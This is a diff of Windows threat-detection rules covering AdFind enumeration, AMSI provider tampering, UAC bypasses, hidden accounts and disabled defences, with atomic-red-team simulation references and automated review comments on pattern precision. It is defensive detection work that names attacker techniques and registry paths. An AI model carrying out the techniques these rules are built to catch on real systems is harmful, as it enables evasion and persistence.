diff --git a/rules/windows/process_creation/proc_creation_win_pua_adfind_susp_usage.yml b/rules/windows/process_creation/proc_creation_win_pua_adfind_susp_usage.yml
index 063f0d855..ba831736d 100644
--- a/rules/windows/process_creation/proc_creation_win_pua_adfind_susp_usage.yml
+++ b/rules/windows/process_creation/proc_creation_win_pua_adfind_susp_usage.yml
@@ -17,7 +17,7 @@ references:
 - https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1087.002/T1087.002.md#atomic-test-7---adfind---enumerate-active-directory-user-objects
 author: Janantha Marasinghe (https://github.com/blueteam0ps), FPT.EagleEye Team, omkar72, oscd.community
 date: 2021-02-02
-modified: 2023-03-05
+modified: 2025-10-24
 tags:
 - attack.discovery
 - attack.t1018
@@ -35,7 +35,7 @@ detection:
 - 'trustdmp'
 - 'dcmodes'
 - 'adinfo'
- - ' dclist '
+ - '-sc dclist'
 - 'computer_pwdnotreqd'
 - 'objectcategory='
 - '-subnets -f'
@@ -54,3 +54,13 @@ detection:
 falsepositives:
 - Legitimate admin activity
 level: high
+regression_tests_path: regression_data/windows/process_creation/proc_creation_win_pua_adfind_susp_usage/info.yml
+simulation:
+ - type: atomic-red-team
+ name: Adfind - Enumerate Active Directory Computer Objects
+ technique: T1018
+ atomic_guid: a889f5be-2d54-4050-bd05-884578748bb4
+ - type: atomic-red-team
+ name: Adfind - Enumerate Active Directory Domain Controller Objects
+ technique: T1018
+ atomic_guid: 5838c31e-a0e2-4b9f-b60a-d79d2cb7995e
diff --git a/rules/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner.yml b/rules/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner.yml
index b83cc8047..b7b62c703 100644
--- a/rules/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner.yml
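Review bot: Replacing `' dclist '` with `'-sc dclist'` removes the old pattern's dependence on a trailing space (a command line ending in `dclist` was previously missed), but the new literal now requires the `-sc` switch and exactly one space immediately before the keyword, so invocations with different whitespace or with `dclist` reached by another route are no longer covered. That is probably the intended trade-off — the two T1018 atomics listed under `simulation` should exercise exactly this form — but it is worth confirming in the regression data before treating the narrower string as equivalent. The `CommandLine|contains` list this entry belongs to starts above the hunk.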
+++ b/rules/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner.yml
@@ -32,3 +32,4 @@ detection:
 falsepositives:
 - Legitimate administrative use
 level: medium
+regression_tests_path: regression_data/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner/info.yml
diff --git a/rules/windows/process_creation/proc_creation_win_pua_advanced_port_scanner.yml b/rules/windows/process_creation/proc_creation_win_pua_advanced_port_scanner.yml
index c9e33cee5..174eb273a 100644
--- a/rules/windows/process_creation/proc_creation_win_pua_advanced_port_scanner.yml
+++ b/rules/windows/process_creation/proc_creation_win_pua_advanced_port_scanner.yml
@@ -28,3 +28,4 @@ falsepositives:
 - Legitimate administrative use
 - Tools with similar commandline (very rare)
 level: medium
+regression_tests_path: regression_data/windows/process_creation/proc_creation_win_pua_advanced_port_scanner/info.yml
diff --git a/rules/windows/process_creation/proc_creation_win_pua_advancedrun.yml b/rules/windows/process_creation/proc_creation_win_pua_advancedrun.yml
index 1336ef273..117747447 100644
--- a/rules/windows/process_creation/proc_creation_win_pua_advancedrun.yml
+++ b/rules/windows/process_creation/proc_creation_win_pua_advancedrun.yml
@@ -37,3 +37,4 @@ detection:
 falsepositives:
 - Unknown
 level: medium
+regression_tests_path: regression_data/windows/process_creation/proc_creation_win_pua_advancedrun/info.yml
diff --git a/rules/windows/process_creation/proc_creation_win_pua_advancedrun_priv_user.yml b/rules/windows/process_creation/proc_creation_win_pua_advancedrun_priv_user.yml
index 88046fe9c..dd159a75a 100644
--- a/rules/windows/process_creation/proc_creation_win_pua_advancedrun_priv_user.yml
+++ b/rules/windows/process_creation/proc_creation_win_pua_advancedrun_priv_user.yml
@@ -40,3 +40,4 @@ detection:
 falsepositives:
 - Unknown
 level: high
+regression_tests_path: regression_data/windows/process_creation/proc_creation_win_pua_advancedrun_priv_user/info.yml
diff --git a/rules/windows/process_creation/proc_creation_win_reg_add_run_key.yml b/rules/windows/process_creation/proc_creation_win_reg_add_run_key.yml
index 9140fb4ab..d0a9a260a 100644
--- a/rules/windows/process_creation/proc_creation_win_reg_add_run_key.yml
+++ b/rules/windows/process_creation/proc_creation_win_reg_add_run_key.yml
@@ -32,3 +32,4 @@ falsepositives:
 - Legitimate administrator sets up autorun keys for legitimate reasons.
 - Discord
 level: medium
+regression_tests_path: regression_data/windows/process_creation/proc_creation_win_reg_add_run_key/info.yml
diff --git a/rules/windows/process_creation/proc_creation_win_reg_add_safeboot.yml b/rules/windows/process_creation/proc_creation_win_reg_add_safeboot.yml
index 84b26b8bf..79a3998a3 100644
--- a/rules/windows/process_creation/proc_creation_win_reg_add_safeboot.yml
+++ b/rules/windows/process_creation/proc_creation_win_reg_add_safeboot.yml
@@ -30,3 +30,4 @@ detection:
 falsepositives:
 - Unlikely
 level: high
+regression_tests_path: regression_data/windows/process_creation/proc_creation_win_reg_add_safeboot/info.yml
diff --git a/rules/windows/process_creation/proc_creation_win_registry_special_accounts_hide_user.yml b/rules/windows/process_creation/proc_creation_win_registry_special_accounts_hide_user.yml
index 6501c3d01..232577048 100644
--- a/rules/windows/process_creation/proc_creation_win_registry_special_accounts_hide_user.yml
+++ b/rules/windows/process_creation/proc_creation_win_registry_special_accounts_hide_user.yml
@@ -32,3 +32,4 @@ detection:
 falsepositives:
 - System administrator activities
 level: medium
+regression_tests_path: regression_data/windows/process_creation/proc_creation_win_registry_special_accounts_hide_user/info.yml
diff --git a/rules/windows/process_creation/proc_creation_win_renamed_adfind.yml b/rules/windows/process_creation/proc_creation_win_renamed_adfind.yml
index 144003fcb..61af8cd78 100644
--- a/rules/windows/process_creation/proc_creation_win_renamed_adfind.yml
+++ b/rules/windows/process_creation/proc_creation_win_renamed_adfind.yml
@@ -61,3 +61,4 @@ detection:
 falsepositives:
 - Unknown
 level: high
+regression_tests_path: regression_data/windows/process_creation/proc_creation_win_renamed_adfind/info.yml
diff --git a/rules/windows/process_creation/proc_creation_win_renamed_binary.yml b/rules/windows/process_creation/proc_creation_win_renamed_binary.yml
index 035666bea..52f808b79 100644
--- a/rules/windows/process_creation/proc_creation_win_renamed_binary.yml
+++ b/rules/windows/process_creation/proc_creation_win_renamed_binary.yml
@@ -48,3 +48,4 @@ detection:
 falsepositives:
 - Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist
 level: medium
+regression_tests_path: regression_data/windows/process_creation/proc_creation_win_renamed_binary/info.yml
diff --git a/rules/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant.yml b/rules/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant.yml
index ced7c19a9..721fd323b 100644
--- a/rules/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant.yml
+++ b/rules/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant.yml
@@ -82,3 +82,4 @@ falsepositives:
 - Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist
 - PsExec installed via Windows Store doesn't contain original filename field (False negative)
 level: high
+regression_tests_path: regression_data/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant/info.yml
diff --git a/rules/windows/process_creation/proc_creation_win_renamed_curl.yml b/rules/windows/process_creation/proc_creation_win_renamed_curl.yml
index 590e23495..d4fddffe0 100644
--- a/rules/windows/process_creation/proc_creation_win_renamed_curl.yml
+++ b/rules/windows/process_creation/proc_creation_win_renamed_curl.yml
@@ -25,3 +25,4 @@ detection: falsepositives: - Unknown level: medium +regression_tests_path: regression_data/windows/process_creation/proc_creation_win_renamed_curl/info.yml diff --git a/rules/windows/process_creation/proc_creation_win_renamed_ftp.yml b/rules/windows/process_creation/proc_creation_win_renamed_ftp.yml index bdad75c80..08e274301 100644 --- a/rules/windows/process_creation/proc_creation_win_renamed_ftp.yml +++ b/rules/windows/process_creation/proc_creation_win_renamed_ftp.yml @@ -24,3 +24,4 @@ detection: falsepositives: - Unknown level: medium +regression_tests_path: regression_data/windows/process_creation/proc_creation_win_renamed_ftp/info.yml diff --git a/rules/windows/process_creation/proc_creation_win_renamed_msdt.yml b/rules/windows/process_creation/proc_creation_win_renamed_msdt.yml index 9979e1358..cd8fbf43c 100644 --- a/rules/windows/process_creation/proc_creation_win_renamed_msdt.yml +++ b/rules/windows/process_creation/proc_creation_win_renamed_msdt.yml @@ -22,3 +22,4 @@ detection: falsepositives: - Unlikely level: high +regression_tests_path: regression_data/windows/process_creation/proc_creation_win_renamed_msdt/info.yml diff --git a/rules/windows/process_creation/proc_creation_win_sc_stop_service.yml b/rules/windows/process_creation/proc_creation_win_sc_stop_service.yml index 0c541cb72..f7491796d 100644 --- a/rules/windows/process_creation/proc_creation_win_sc_stop_service.yml +++ b/rules/windows/process_creation/proc_creation_win_sc_stop_service.yml @@ -26,3 +26,4 @@ detection: falsepositives: - There are many legitimate reasons to stop a service. This rule isn't looking for any suspicious behavior in particular. Filter legitimate activity accordingly level: low +regression_tests_path: regression_data/windows/process_creation/proc_creation_win_sc_stop_service/info.yml 
diff --git a/rules/windows/registry/registry_add/registry_add_persistence_amsi_providers.yml b/rules/windows/registry/registry_add/registry_add_persistence_amsi_providers.yml deleted file mode 100644 index 50e86dc34..000000000 --- a/rules/windows/registry/registry_add/registry_add_persistence_amsi_providers.yml +++ /dev/null @@ -1,30 +0,0 @@ -title: Potential Persistence Via New AMSI Providers - Registry -id: 33efc23c-6ea2-4503-8cfe-bdf82ce8f705 -status: test -description: Detects when an attacker registers a new AMSI provider in order to achieve persistence -references: - - https://persistence-info.github.io/Data/amsi.html - - https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/FakeAMSI/FakeAMSI.c -author: Nasreddine Bencherchali (Nextron Systems) -date: 2022-07-21 -modified: 2023-02-07 -tags: - - attack.persistence -logsource: - category: registry_add - product: windows -detection: - selection: - EventType: CreateKey - TargetObject|contains: - - '\SOFTWARE\Microsoft\AMSI\Providers\' - - '\SOFTWARE\WOW6432Node\Microsoft\AMSI\Providers\' - filter: - Image|startswith: - - 'C:\Windows\System32\' - - 'C:\Program Files\' - - 'C:\Program Files (x86)\' - condition: selection and not filter -falsepositives: - - Legitimate security products adding their own AMSI providers. Filter these according to your environment -level: high diff --git a/rules/windows/registry/registry_add/registry_add_persistence_disk_cleanup_handler_entry.yml b/rules/windows/registry/registry_add/registry_add_persistence_disk_cleanup_handler_entry.yml index 42854def3..aac7441cb 100644 --- a/rules/windows/registry/registry_add/registry_add_persistence_disk_cleanup_handler_entry.yml +++ b/rules/windows/registry/registry_add/registry_add_persistence_disk_cleanup_handler_entry.yml 
@@ -23,7 +23,7 @@ detection: selection: EventType: CreateKey TargetObject|contains: '\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\VolumeCaches\' - filter: + filter_main_default_keys: # Default Keys TargetObject|endswith: - '\Active Setup Temp Folders' @@ -58,7 +58,7 @@ detection: - '\Windows Error Reporting Files' - '\Windows ESD installation files' - '\Windows Upgrade Log Files' - condition: selection and not filter + condition: selection and not 1 of filter_main_* falsepositives: - Legitimate new entry added by windows level: medium diff --git a/rules/windows/registry/registry_delete/registry_delete_removal_amsi_registry_key.yml b/rules/windows/registry/registry_delete/registry_delete_removal_amsi_registry_key.yml index 3324fac1b..1011737df 100644 --- a/rules/windows/registry/registry_delete/registry_delete_removal_amsi_registry_key.yml +++ b/rules/windows/registry/registry_delete/registry_delete_removal_amsi_registry_key.yml @@ -29,3 +29,9 @@ detection: falsepositives: - Unlikely level: high +regression_tests_path: regression_data/windows/registry/registry_delete/registry_delete_removal_amsi_registry_key/info.yml +simulation: + - type: atomic-red-team + name: AMSI Bypass - Remove AMSI Provider Reg Key + technique: T1562.001 + atomic_guid: 13f09b91-c953-438e-845b-b585e51cac9b diff --git a/rules/windows/registry/registry_delete/registry_delete_runmru.yml b/rules/windows/registry/registry_delete/registry_delete_runmru.yml index 7c168a96d..9f6f8863d 100644 --- a/rules/windows/registry/registry_delete/registry_delete_runmru.yml +++ b/rules/windows/registry/registry_delete/registry_delete_runmru.yml @@ -25,3 +25,4 @@ detection: falsepositives: - Unknown level: high +regression_tests_path: regression_data/windows/registry/registry_delete/registry_delete_runmru/info.yml 
diff --git a/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_index_value_removal.yml b/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_index_value_removal.yml index d0c06457e..c884bbe7f 100644 --- a/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_index_value_removal.yml +++ b/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_index_value_removal.yml @@ -11,7 +11,7 @@ references: - https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments author: Nasreddine Bencherchali (Nextron Systems) date: 2022-08-26 -modified: 2023-02-08 +modified: 2025-10-25 tags: - attack.defense-evasion - attack.t1562 @@ -20,7 +20,6 @@ logsource: category: registry_delete detection: selection: - EventType: DeleteKey TargetObject|contains|all: - '\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\' - 'Index' @@ -28,3 +27,4 @@ detection: falsepositives: - Unknown level: medium +regression_tests_path: regression_data/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_index_value_removal/info.yml diff --git a/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml b/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml index d33cc045d..293b73d44 100644 --- a/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml +++ b/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml @@ -9,7 +9,7 @@ references: - https://www.microsoft.com/security/blog/2022/04/12/tarrask-malware-uses-scheduled-tasks-for-defense-evasion/ author: Sittikorn S date: 2022-04-15 -modified: 2023-02-08 +modified: 2025-10-25 tags: - attack.defense-evasion - attack.t1562 
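Review bot: Dropping `EventType: DeleteKey` from the selection is the right move for the Tarrask technique, since `Index` is a value and its removal shows up as a DeleteValue event, but the selection still matches with `TargetObject|contains|all` on the bare token `'Index'`, so the widened rule now fires on any key or value deletion under a task whose path merely contains that string — the built-in `\Microsoft\Windows\Shell\IndexerAutomaticMaintenance` task is one such path. Because the deleted value name is the last component of TargetObject, the precise form is `TargetObject|endswith: '\Index'` alongside the existing `contains` on `\Schedule\TaskCache\Tree\`. The `condition` line of this selection lies outside the hunk, so I assume it is still `condition: selection`.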
@@ -18,7 +18,6 @@ logsource: category: registry_delete detection: selection: - EventType: DeleteKey TargetObject|contains|all: - '\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\' - 'SD' @@ -26,3 +25,4 @@ detection: falsepositives: - Unknown level: medium +regression_tests_path: regression_data/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal/info.yml diff --git a/rules/windows/registry/registry_event/registry_event_add_local_hidden_user.yml b/rules/windows/registry/registry_event/registry_event_add_local_hidden_user.yml index 27b24208b..1991a7362 100644 --- a/rules/windows/registry/registry_event/registry_event_add_local_hidden_user.yml +++ b/rules/windows/registry/registry_event/registry_event_add_local_hidden_user.yml @@ -6,7 +6,7 @@ references: - https://twitter.com/SBousseaden/status/1387530414185664538 author: Christian Burkard (Nextron Systems) date: 2021-05-03 -modified: 2022-08-05 +modified: 2025-10-31 tags: - attack.persistence - attack.t1136.001 @@ -16,9 +16,15 @@ logsource: detection: selection: TargetObject|contains: '\SAM\SAM\Domains\Account\Users\Names\' - TargetObject|endswith: '$' + TargetObject|endswith: '$\(Default)' Image|endswith: '\lsass.exe' condition: selection falsepositives: - Unknown level: high +regression_tests_path: regression_data/windows/registry/registry_event/registry_event_add_local_hidden_user/info.yml +simulation: + - type: atomic-red-team + name: Create Hidden User in Registry + technique: T1564.002 + atomic_guid: 173126b7-afe4-45eb-8680-fa9f6400431c diff --git a/rules/windows/registry/registry_set/registry_set_add_load_service_in_safe_mode.yml b/rules/windows/registry/registry_set/registry_set_add_load_service_in_safe_mode.yml index f5e9d556a..b8a126dfd 100644 --- a/rules/windows/registry/registry_set/registry_set_add_load_service_in_safe_mode.yml +++ b/rules/windows/registry/registry_set/registry_set_add_load_service_in_safe_mode.yml 
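Review bot: After removing `EventType: DeleteKey`, the selection's `TargetObject|contains|all` with the two-character token `'SD'` matches any key or value deletion under a TaskCache\Tree path that happens to contain that substring, not only removal of a task's `SD` value, so the rule now inherits both DeleteKey and DeleteValue noise from task names. The value name is the final component of the deleted object, so `TargetObject|endswith: '\SD'` (keeping the `contains` on `\Schedule\TaskCache\Tree\`) pins the rule to the behaviour it describes. The `condition` line of this selection is outside the hunk.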
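Review bot: Changing `TargetObject|endswith` from `'$'` to `'$\(Default)'` narrows the rule to the SetValue on the new account's default value and no longer matches the CreateKey event for `...\Users\Names\<name>$` itself, which the previous pattern covered (the file path suggests a `registry_event` logsource, which spans both event types). If that narrowing is intentional, for example because the key-creation event proved noisy, the rationale belongs in the rule; otherwise both shapes can be kept with a list, `TargetObject|endswith: ['$', '$\(Default)']`. I can only infer from the added regression path that the sample exercises the `(Default)` write rather than the key creation.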
@@ -42,3 +42,13 @@ detection: falsepositives: - Unknown level: high +regression_tests_path: regression_data/windows/registry/registry_set/registry_set_add_load_service_in_safe_mode/info.yml +simulation: + - type: atomic-red-team + name: Windows Add Registry Value to Load Service in Safe Mode without Network + technique: T1112 + atomic_guid: 1dd59fb3-1cb3-4828-805d-cf80b4c3bbb5 + - type: atomic-red-team + name: Windows Add Registry Value to Load Service in Safe Mode with Network + technique: T1112 + atomic_guid: c173c948-65e5-499c-afbe-433722ed5bd4 diff --git a/rules/windows/registry/registry_set/registry_set_add_port_monitor.yml b/rules/windows/registry/registry_set/registry_set_add_port_monitor.yml index 922861fe9..4e2079f06 100644 --- a/rules/windows/registry/registry_set/registry_set_add_port_monitor.yml +++ b/rules/windows/registry/registry_set/registry_set_add_port_monitor.yml @@ -38,3 +38,9 @@ detection: falsepositives: - Unknown level: medium +regression_tests_path: regression_data/windows/registry/registry_set/registry_set_add_port_monitor/info.yml +simulation: + - type: atomic-red-team + name: Add Port Monitor persistence in Registry + technique: T1547.010 + atomic_guid: d34ef297-f178-4462-871e-9ce618d44e50 diff --git a/rules/windows/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature.yml b/rules/windows/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature.yml index b6451dfe2..8c69e5a2c 100644 --- a/rules/windows/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature.yml +++ b/rules/windows/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature.yml 
@@ -22,3 +22,9 @@ detection: falsepositives: - Legitimate use of the feature (alerts should be investigated either way) level: medium +regression_tests_path: regression_data/windows/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature/info.yml +simulation: + - type: atomic-red-team + name: Allow RDP Remote Assistance Feature + technique: T1112 + atomic_guid: 86677d0e-0b5e-4a2b-b302-454175f9aa9e diff --git a/rules/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute.yml b/rules/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute.yml index d502fa46e..5caf8facc 100644 --- a/rules/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute.yml +++ b/rules/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute.yml @@ -24,3 +24,9 @@ detection: falsepositives: - Unknown level: high +regression_tests_path: regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute/info.yml +simulation: + - type: atomic-red-team + name: Bypass UAC using sdclt DelegateExecute + technique: T1548.002 + atomic_guid: 3be891eb-4608-4173-87e8-78b494c029b7 diff --git a/rules/windows/registry/registry_set/registry_set_bypass_uac_using_eventviewer.yml b/rules/windows/registry/registry_set/registry_set_bypass_uac_using_eventviewer.yml index d07c281b1..7f5f49021 100644 --- a/rules/windows/registry/registry_set/registry_set_bypass_uac_using_eventviewer.yml +++ b/rules/windows/registry/registry_set/registry_set_bypass_uac_using_eventviewer.yml @@ -24,3 +24,9 @@ detection: falsepositives: - Unknown level: high +regression_tests_path: regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_eventviewer/info.yml +simulation: + - type: atomic-red-team + name: Bypass UAC using Event Viewer (cmd) + technique: T1548.002 + atomic_guid: 5073adf8-9a50-4bd9-b298-a9bd2ead8af9 
diff --git a/rules/windows/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task.yml b/rules/windows/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task.yml index e9082ba3b..ff94c3caf 100644 --- a/rules/windows/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task.yml +++ b/rules/windows/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task.yml @@ -28,3 +28,9 @@ detection: falsepositives: - Unknown level: high +regression_tests_path: regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task/info.yml +simulation: + - type: atomic-red-team + name: Bypass UAC using SilentCleanup Task + technique: T1548.002 + atomic_guid: 28104f8a-4ff1-4582-bcf6-699dce156608 diff --git a/rules/windows/registry/registry_set/registry_set_change_rdp_port.yml b/rules/windows/registry/registry_set/registry_set_change_rdp_port.yml index 6cae9accb..9b1c27028 100644 --- a/rules/windows/registry/registry_set/registry_set_change_rdp_port.yml +++ b/rules/windows/registry/registry_set/registry_set_change_rdp_port.yml @@ -6,7 +6,7 @@ description: | Remote desktop is a common feature in operating systems. It allows a user to log into a remote system using an interactive session with a graphical user interface. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS). references: - - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#atomic-test-1---rdp-to-domaincontroller + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md author: frack113 date: 2022-01-01 modified: 2024-03-25 
@@ -26,3 +26,13 @@ detection: falsepositives: - Unknown level: high +regression_tests_path: regression_data/windows/registry/registry_set/registry_set_change_rdp_port/info.yml +simulation: + - type: atomic-red-team + name: Changing RDP Port to Non Standard Port via Powershell + technique: T1021.001 + atomic_guid: 2f840dd4-8a2e-4f44-beb3-6b2399ea3771 + - type: atomic-red-team + name: Changing RDP Port to Non Standard Port via Command_Prompt + technique: T1021.001 + atomic_guid: 74ace21e-a31c-4f7d-b540-53e4eb6d1f73 diff --git a/rules/windows/registry/registry_set/registry_set_change_security_zones.yml b/rules/windows/registry/registry_set/registry_set_change_security_zones.yml index 847597d58..7fa7512ac 100644 --- a/rules/windows/registry/registry_set/registry_set_change_security_zones.yml +++ b/rules/windows/registry/registry_set/registry_set_change_security_zones.yml @@ -29,3 +29,9 @@ detection: falsepositives: - Administrative scripts level: medium +regression_tests_path: regression_data/windows/registry/registry_set/registry_set_change_security_zones/info.yml +simulation: + - type: atomic-red-team + name: Add Domain to Trusted Sites Zone + technique: T1112 + atomic_guid: cf447677-5a4e-4937-a82c-e47d254afd57 diff --git a/rules/windows/registry/registry_set/registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled.yml b/rules/windows/registry/registry_set/registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled.yml index 48f581187..69a576d19 100644 --- a/rules/windows/registry/registry_set/registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled.yml +++ b/rules/windows/registry/registry_set/registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled.yml 
@@ -18,11 +18,17 @@ logsource: detection: selection: TargetObject|endswith: - - '\Microsoft\Windows\DeviceGuard\HypervisorEnforcedCodeIntegrity' - '\Control\DeviceGuard\HypervisorEnforcedCodeIntegrity' - '\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity\Enabled' + - '\Microsoft\Windows\DeviceGuard\HypervisorEnforcedCodeIntegrity' Details: 'DWORD (0x00000000)' condition: selection falsepositives: - Unknown level: high +regression_tests_path: regression_data/windows/registry/registry_set/registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled/info.yml +simulation: + - type: atomic-red-team + name: Disable Hypervisor-Enforced Code Integrity (HVCI) + technique: T1562.001 + atomic_guid: 70bd71e6-eba4-4e00-92f7-617911dbe020 diff --git a/rules/windows/registry/registry_set/registry_set_disable_administrative_share.yml b/rules/windows/registry/registry_set/registry_set_disable_administrative_share.yml index 7a5593f2d..22b34dbcd 100644 --- a/rules/windows/registry/registry_set/registry_set_disable_administrative_share.yml +++ b/rules/windows/registry/registry_set/registry_set_disable_administrative_share.yml @@ -24,3 +24,9 @@ detection: falsepositives: - Unknown level: medium +regression_tests_path: regression_data/windows/registry/registry_set/registry_set_disable_administrative_share/info.yml +simulation: + - type: atomic-red-team + name: Disable Administrative Share Creation at Startup + technique: T1070.005 + atomic_guid: 99c657aa-ebeb-4179-a665-69288fdd12b8 diff --git a/rules/windows/registry/registry_set/registry_set_disable_defender_firewall.yml b/rules/windows/registry/registry_set/registry_set_disable_defender_firewall.yml index 0f17d3905..392f3670f 100644 --- a/rules/windows/registry/registry_set/registry_set_disable_defender_firewall.yml +++ b/rules/windows/registry/registry_set/registry_set_disable_defender_firewall.yml 
@@ -25,3 +25,9 @@ detection: falsepositives: - Unknown level: medium +regression_tests_path: regression_data/windows/registry/registry_set/registry_set_disable_defender_firewall/info.yml +simulation: + - type: atomic-red-team + name: Disable Microsoft Defender Firewall via Registry + technique: T1562.004 + atomic_guid: afedc8c4-038c-4d82-b3e5-623a95f8a612 diff --git a/rules/windows/registry/registry_set/registry_set_disable_security_center_notifications.yml b/rules/windows/registry/registry_set/registry_set_disable_security_center_notifications.yml index 942ec0a23..1f6beae84 100644 --- a/rules/windows/registry/registry_set/registry_set_disable_security_center_notifications.yml +++ b/rules/windows/registry/registry_set/registry_set_disable_security_center_notifications.yml @@ -22,3 +22,9 @@ detection: falsepositives: - Unknown level: medium +regression_tests_path: regression_data/windows/registry/registry_set/registry_set_disable_security_center_notifications/info.yml +simulation: + - type: atomic-red-team + name: Disable Windows Security Center Notifications + technique: T1112 + atomic_guid: 45914594-8df6-4ea9-b3cc-7eb9321a807e diff --git a/rules/windows/registry/registry_set/registry_set_persistence_amsi_providers.yml b/rules/windows/registry/registry_set/registry_set_persistence_amsi_providers.yml new file mode 100644 index 000000000..006582cfd --- /dev/null +++ b/rules/windows/registry/registry_set/registry_set_persistence_amsi_providers.yml 
@@ -0,0 +1,41 @@
+title: Potential Persistence Via New AMSI Providers - Registry
+id: 33efc23c-6ea2-4503-8cfe-bdf82ce8f705
+status: test
+description: |
+ Detects when an attacker adds a new AMSI provider via the Windows Registry to bypass AMSI (Antimalware Scan Interface) protections.
+ Attackers may add custom AMSI providers to persist on the system and evade detection by security software that relies on AMSI for scanning scripts and other content.
+ This technique is often used in conjunction with fileless malware and script-based attacks to maintain persistence while avoiding detection.
+references:
+ - https://persistence-info.github.io/Data/amsi.html
+ - https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/FakeAMSI/FakeAMSI.c
+author: Nasreddine Bencherchali (Nextron Systems)
+date: 2022-07-21
+modified: 2025-10-26
+tags:
+ - attack.persistence
+logsource:
+ category: registry_set
+ product: windows
+detection:
+ selection:
+ TargetObject|contains:
+ - '\SOFTWARE\Microsoft\AMSI\Providers\'
+ - '\SOFTWARE\WOW6432Node\Microsoft\AMSI\Providers\'
+ filter_optional_avast:
+ Image:
+ - 'C:\Program Files\Avast Software\Avast\RegSvr.exe'
+ - 'C:\Program Files\Avast Software\Avast\x86\RegSvr.exe'
+ TargetObject|contains: '\{FB904E4E-D2C7-4C8D-8492-B620BB9896B1}'
+ filter_optional_avg:
+ Image:
+ - 'C:\Program Files\AVG\Antivirus\RegSvr.exe'
+ - 'C:\Program Files\AVG\Antivirus\x86\RegSvr.exe'
+ TargetObject|contains: '\{FB904E4E-D2C7-4C8D-8492-B620BB9896B1}'
+ filter_optional_avira:
+ Image: 'C:\Program Files\Avira\Endpoint Protection SDK\endpointprotection.exe'
+ TargetObject|contains: '\{00000001-3DCC-4B48-A82E-E2071FE58E05}'
+ condition: selection and not 1 of filter_optional_*
+falsepositives:
+ - Legitimate security products adding their own AMSI providers. Filter these according to your environment.
+level: medium
+regression_tests_path: regression_data/windows/registry/registry_set/registry_set_persistence_amsi_providers/info.yml
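Review bot: Re-homing this rule under `category: registry_set` (the `registry_add` file carrying the same `id` is deleted earlier in this commit) means a provider registered by merely creating `HKLM\SOFTWARE\Microsoft\AMSI\Providers\{CLSID}` with no value written — a bare `reg add` of the key, for instance — yields only a CreateKey event and is no longer covered. If the goal is to see both the key creation and any value written beneath it, `category: registry_event` keeps the present selection and vendor filters unchanged while matching both event types; if only SetValue is intended, the description should say so. The per-vendor `Image` plus CLSID filters are a clear improvement over the old path-prefix exclusion, which anything executing from `C:\Windows\System32\` could have hidden behind.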
